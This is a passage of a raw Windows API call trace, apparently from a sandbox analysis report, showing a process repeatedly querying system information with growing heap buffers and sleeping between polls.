out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.354] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0274.355] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0274.355] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.356] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0274.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.357] Sleep (dwMilliseconds=0x110) [0274.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0274.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0274.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0274.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0274.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0274.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0274.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0274.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0274.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.380] Sleep (dwMilliseconds=0x110) [0274.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0274.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0274.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0274.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0274.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0274.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0274.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0274.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0274.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.397] Sleep (dwMilliseconds=0x110) [0274.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0274.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0274.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0274.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0274.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0274.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0274.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0274.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0274.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.410] Sleep (dwMilliseconds=0x110) [0274.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0274.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0274.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0274.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0274.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0274.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0274.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0274.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0274.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.491] Sleep (dwMilliseconds=0x110) [0274.539] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0274.539] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0274.540] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0274.540] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0274.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0274.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0274.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0274.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0274.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.547] Sleep (dwMilliseconds=0x110) [0274.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0274.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0274.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0274.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0274.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0274.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0274.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0274.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0274.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.564] Sleep (dwMilliseconds=0x110) [0274.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0274.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0274.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0274.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0274.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0274.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0274.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.578] Sleep (dwMilliseconds=0x110) [0274.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0274.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0274.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0274.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0274.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0274.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0274.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0274.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0274.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.597] Sleep (dwMilliseconds=0x110) [0274.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0274.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0274.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0274.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0274.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0274.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0274.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0274.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0274.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.616] Sleep (dwMilliseconds=0x110) [0274.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0274.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0274.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0274.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0274.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0274.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0274.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0274.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0274.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.629] Sleep (dwMilliseconds=0x110) [0274.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0274.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0274.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0274.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0274.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0274.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0274.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0274.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0274.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.645] Sleep (dwMilliseconds=0x110) [0274.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0274.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0274.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0274.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0274.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0274.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0274.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0274.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0274.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.660] Sleep (dwMilliseconds=0x110) [0274.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0274.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0274.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0274.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0274.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0274.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0274.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0274.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0274.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.678] Sleep (dwMilliseconds=0x110) [0274.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0274.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0274.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0274.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0274.767] RtlAllocateHeap (HeapHandle=0x2560000, 